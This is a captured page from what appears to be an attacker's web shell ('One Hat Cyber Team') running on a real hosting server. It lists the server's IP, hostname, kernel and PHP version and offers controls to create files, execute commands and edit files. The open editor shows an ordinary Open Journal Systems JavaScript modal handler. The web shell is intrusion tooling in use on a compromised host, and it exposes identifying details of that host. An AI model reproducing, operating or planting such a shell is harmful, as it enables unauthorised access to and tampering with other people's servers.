One Hat Cyber Team
Your IP :
216.73.216.182
Server IP :
203.175.9.166
Server :
Linux tanggamus.iixcp.rumahweb.net 5.14.0-427.28.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 2 03:44:10 EDT 2024 x86_64
Server Software :
LiteSpeed
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
cite5577
/
www
/
lib
/
pkp
/
js
/
controllers
/
modal
/
Edit File:
RedirectConfirmationModalHandler.js
/** * @file js/controllers/modal/RedirectConfirmationModalHandler.js * * Copyright (c) 2014-2021 Simon Fraser University * Copyright (c) 2000-2021 John Willinsky * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING. * * @class RedirectConfirmationModalHandler * @ingroup js_controllers_modal * * @brief A confirmation modal that redirects to a URL upon confirmation. */ (function($) { /** * @constructor * * @extends $.pkp.controllers.modal.ConfirmationModalHandler * * @param {jQueryObject} $handledElement The clickable element * the modal will be attached to. * @param {Object} options Non-default options to configure * the modal. * * Options are: * - remoteUrl string A URL to be redirected to when the confirmation * button has been clicked. * - All options from the ConfirmationModalHandler and ModalHandler * widgets. * - All options documented for the jQueryUI dialog widget, * except for the buttons parameter which is not supported. */ $.pkp.controllers.modal.RedirectConfirmationModalHandler = function($handledElement, options) { this.parent($handledElement, options); // Configure the redirect URL to be called when // the modal closes. this.remoteUrl_ = options.remoteUrl; }; $.pkp.classes.Helper.inherits( $.pkp.controllers.modal.RedirectConfirmationModalHandler, $.pkp.controllers.modal.ConfirmationModalHandler); // // Private properties // /** * A URL to be redirected to when the confirmation button * has been clicked. * @private * @type {?string} */ $.pkp.controllers.modal.RedirectConfirmationModalHandler.prototype. remoteUrl_ = null; // // Protected methods // /** @inheritDoc */ $.pkp.controllers.modal.RedirectConfirmationModalHandler.prototype. checkOptions = function(options) { // Check the mandatory options of the ModalHandler handler. if (!this.parent('checkOptions', options)) { return false; } // Check for our own mandatory options. // The cancel button is mandatory for redirect confirmation modals. return typeof options.cancelButton === 'string' && typeof options.remoteUrl === 'string'; }; // // Public methods // /** * Callback that will be activated when the modal's * confirm button is clicked. * * @param {HTMLElement} dialogElement The element the * dialog was created on. * @param {Event} event The click event. */ $.pkp.controllers.modal.RedirectConfirmationModalHandler.prototype. modalConfirm = function(dialogElement, event) { document.location = this.remoteUrl_; }; }(jQuery));
Simpan